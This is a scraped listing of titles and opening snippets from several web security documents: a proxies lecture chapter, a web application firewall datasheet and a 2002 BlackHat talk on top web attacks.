Applications and data are the main targets for modern attacks. Adoption of dedicated application and data security concepts, technologies and methodologies is a must for all enterprises. Hype Cycle for
Proxies. Chapter 4. Network & Security Gildas Avoine
Proxies Chapter 4 Network & Security Gildas Avoine SUMMARY OF CHAPTER 4 Generalities Forward Proxies Reverse Proxies Open Proxies Conclusion GENERALITIES Generalities Forward Proxies Reverse Proxies Open
REAL-TIME WEB APPLICATION PROTECTION. AWF SERIES DATASHEET WEB APPLICATION FIREWALL
REAL-TIME WEB APPLICATION PROTECTION. AWF SERIES DATASHEET WEB APPLICATION FIREWALL AWF Series Web application firewalls provide industry-leading Web application attack protection, ensuring continuity
Top Ten Web Attacks. Saumil Shah Net-Square. BlackHat Asia 2002, Singapore
Top Ten Web Attacks Saumil Shah Net-Square BlackHat Asia 2002, Singapore TodayÕs battleground Ð the Web Web sites and web applications rapidly growing. Complex business applications are now delivered over
